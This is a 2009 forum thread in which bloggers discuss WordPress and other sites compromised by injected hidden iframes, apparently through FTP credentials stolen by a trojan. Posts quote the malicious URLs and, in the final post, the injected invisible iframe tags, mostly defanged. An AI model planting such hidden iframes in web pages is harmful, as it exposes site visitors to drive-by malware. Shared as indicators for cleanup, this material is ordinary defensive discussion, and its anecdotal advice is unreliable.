1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

lol hacked....freakin wp....hacked!!!

Discussion in 'Blogging' started by shylesson, Aug 18, 2009.

  1. shylesson

    shylesson Power Member

    Joined:
    Jan 10, 2008
    Messages:
    665
    Likes Received:
    2,090
    Location:
    ‹^›‹(•¿•)›‹^›
    smh.... I'm laughing from delirium ...really... I mean it's just so freaking funny... And I can't figure out why or how... well why doesn't really matter; I Googled and found lots of other sites hacked with the same iframe so I'm not the target specifically, but damn man....freakin A.... hackeddddddddddddddd

    before you say:

    1. they were various blogs and not even all that were on the same host/account. Meaning:
    a. I have one reseller account that has 4 'accounts' on it. One one of those accounts I have 15 blogs. Only 7 were 'affected'. Of those 7, 6 were wp v 2.7.1 and 1 was 2.8.2. Of those 7, 2 were established last year. One of those two was established the same year as another one of those 15 blogs and yet that one was not affected.
    b. None of the blogs on the other 'accounts' were affected even though they were created only a month before the ones on the affected account.

    2. I did not update my older blogs because of the recent problems with the latest versions of wp and the plugins I was using so I decided to wait until everything was fixed, but the afflicted sites varied in their wp versions!

    3. I did not use the same passwords on any of the blogs.

    4. I manually installed half of the afflicted blogs! [and before you say it, I manually installed some of the ones not afflicted too]. M A N U A L L Y! I was sooooo manual about it that I made nifty db names and db user names and nifty passwords and generated new 'security' keys for each and every config file...........GRRRRRRRRRRRRRRRRRR......

    5. I haven't found another blog on my other accounts yet that has been affected and these are blogs I setup either on the same day or same week or monthish as many of the afflicted blogs. Before you say anything THERE:
    a. Most of those accounts are with the same host as the ones affected [hostgator btw]
    b. I haven't updated those either but they vary in wp versions too.

    idk what went wrong. :/

    All variations of this link are iframed in the afflicted files too:

    Code:
    http://c9u.at:8080/ts/in.cgi?pepsi147
    I wouldn't even have noticed if I didn't actually login to my adsense and notice some channels not performing. GAWD! K so this is my first time being hacked [scratch that--I have been hacked before, but not while using Wordpress] so I am just blah. But at least now I have stopped laughing... the delirium has subsided...I needed to vent....Now to fix the sites............gawd.
     
  2. jonnyh431

    jonnyh431 Junior Member

    Joined:
    Jan 27, 2009
    Messages:
    165
    Likes Received:
    105
    Location:
    UK
    Did you set your file permissions to 777?
     
  3. shylesson

    shylesson Power Member

    Joined:
    Jan 10, 2008
    Messages:
    665
    Likes Received:
    2,090
    Location:
    ‹^›‹(•¿•)›‹^›
    .....................755
     
  4. jonnyh431

    jonnyh431 Junior Member

    Joined:
    Jan 27, 2009
    Messages:
    165
    Likes Received:
    105
    Location:
    UK
    Not sure then, could it have been someone you know? Or maybe a firefox password stealer/keylogger etc.
     
  5. stealthisblog

    stealthisblog Regular Member

    Joined:
    May 26, 2008
    Messages:
    289
    Likes Received:
    238
    Location:
    New York City
    The hacker either

    -hacked another site on the server you're on and got into your sites. This seems most logical, if they're aiming to make money from hacks they would most likely take over every site on a server they get into

    -exploited a plugin you're running

    -hacked your host (it happens surprisingly alot)

    -bruteforced your wp installs (doubtful)

    -keylogged/trojaned you

    -got into your email and got the passwords - did you use your email pwd anywhere else?
     
  6. flybeta

    flybeta Junior Member

    Joined:
    Feb 7, 2009
    Messages:
    185
    Likes Received:
    14
    um easy hack man if before revision 2.8.4 they just reset ur pass its on vulnerability list ppl can just google the older revisions o_O
     
  7. adamster

    adamster Regular Member

    Joined:
    Nov 1, 2008
    Messages:
    210
    Likes Received:
    83
    If you are using a script which has been nulled from the net and has been installed on your server, make sure it doesnt have anything which looks suspicious. I know some people who have been hacked by using certain plugins shared around.
     
  8. shylesson

    shylesson Power Member

    Joined:
    Jan 10, 2008
    Messages:
    665
    Likes Received:
    2,090
    Location:
    ‹^›‹(•¿•)›‹^›
    my desktop had a trojan horse 4-5 days ago and I only use firefox. idk if i was logged into anything though--my gf was using it when she picked it up. I had to reload xp and do a fresh install. Would that have been an issue?

    But once I removed the iframes, i was still able to login to them using the correct passwords [which yes I changed too and changed all my other passwords.

    I got them all fixed up now. Off to bed. :/
     
  9. Nocali

    Nocali Newbie

    Joined:
    May 29, 2009
    Messages:
    41
    Likes Received:
    6
    Can you tell us which ones to look out for ?
     
  10. keinehabe

    keinehabe Supreme Member

    Joined:
    Nov 4, 2008
    Messages:
    1,207
    Likes Received:
    472
    Gender:
    Male
    Occupation:
    -= CEO =-
    Location:
    Heaven
    Home Page:
    it's an xml vulnerability everyone can be affected and in special wp blogs :) why ? because most of you guys leave '' footprints '' :)
     
  11. keinehabe

    keinehabe Supreme Member

    Joined:
    Nov 4, 2008
    Messages:
    1,207
    Likes Received:
    472
    Gender:
    Male
    Occupation:
    -= CEO =-
    Location:
    Heaven
    Home Page:
    it's an xml vulnerability everyone can be affected and in special wp blogs :) why ? because most of you guys leave '' footprints '' :)
     
  12. bluerickshaw

    bluerickshaw Junior Member

    Joined:
    Sep 23, 2008
    Messages:
    139
    Likes Received:
    40
    its a trojan on your pc, i had it a week ago and there have been a few posts similar to this on BHW recently. Its a Virux or Virut variant, very nasty and cant be cleaned. You have to nuke your pc with the OS install discs.
     
  13. vokzzi

    vokzzi Registered Member

    Joined:
    May 29, 2008
    Messages:
    91
    Likes Received:
    20
    I have the same problem. index.php and default-filters.php and default-widgets.php in my wp installation tend to be infected. I have also a trojan on my computer. NOD32 found nothing now.
    I suspect that I got trojan when I loaded and installed a wp themes I found on this forum. :bawling:
     
  14. onetoo3com

    onetoo3com Registered Member

    Joined:
    Mar 25, 2009
    Messages:
    92
    Likes Received:
    49
    How do you know if you have picked anything up if your AV hasn't detected it?
     
  15. oxonbeef

    oxonbeef BANNED BANNED

    Joined:
    Jan 4, 2009
    Messages:
    2,242
    Likes Received:
    7,872
    Download HijackThis 2.0.2 scan your pc with it and submit the text file
    for analysis.
     
  16. Sniper

    Sniper Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2008
    Messages:
    471
    Likes Received:
    213
    Location:
    Torrent Assault
    Home Page:
    Remove the iframe as fast as possible or google will label the site as harmful in the search results and anyone who navigates to it using firefox will get an attack site warning. If this happens, you need to request an evaluation using webmaster tools.
     
  17. lizmoz

    lizmoz Power Member

    Joined:
    Oct 10, 2008
    Messages:
    560
    Likes Received:
    328
    Same shit happened to me. Trojan on my pc, logged into ftp account @ hosting provider..went through ALL my sites and inserted shit into the .php files. Same happened to you now. Your blogs were not hacked, but the ftp account passwords stolen.

    Am going to nuke it like bluerickshaw suggested to me too just to be sure.
     
  18. Nocali

    Nocali Newbie

    Joined:
    May 29, 2009
    Messages:
    41
    Likes Received:
    6
    so what program or themes have you all used in common? It wold be nice to know whats infected so we dont all end up in the same boat.
     
  19. Vbp6us

    Vbp6us Newbie

    Joined:
    Jul 24, 2009
    Messages:
    30
    Likes Received:
    1
    Location:
    Windsor
    Yes I am especially curious of the source too. Someone said it was an FTP account exploit. :eek: Any information on this? Security measures?

    Thanks
     
  20. KronusOfChaos

    KronusOfChaos Newbie

    Joined:
    Apr 23, 2009
    Messages:
    4
    Likes Received:
    9
    Occupation:
    IT Infrastructure Manager
    Location:
    Houston, Texas..... Where the Men are men and the
    Just an FYI. It's not just Wordpress that is being exploited. I had the same issue on a non WordPress Site that got hacked.... Here was what i found in several of my files:

    <iframe src="hxxp://cubanbigtop.cn:8080/index.ph
    <iframe src="hxxp://c6y.ru:8080/index.p
    <iframe src="hxxp://u3j.ru:8080/index.
    <iframe src="hxxp://u5m.ru:8080/index
    <iframe src="hxxp://q0j.ru:8080/inde
    <iframe src="hxxp://u0b.in:8080/ts/in.cgi?pe
    <iframe src="hxxp://x8b.in:8080/in
    <iframe src="hxxp://x9m.in:8080/index.php" width=155 height=152 style="visibility: hidden"></iframe>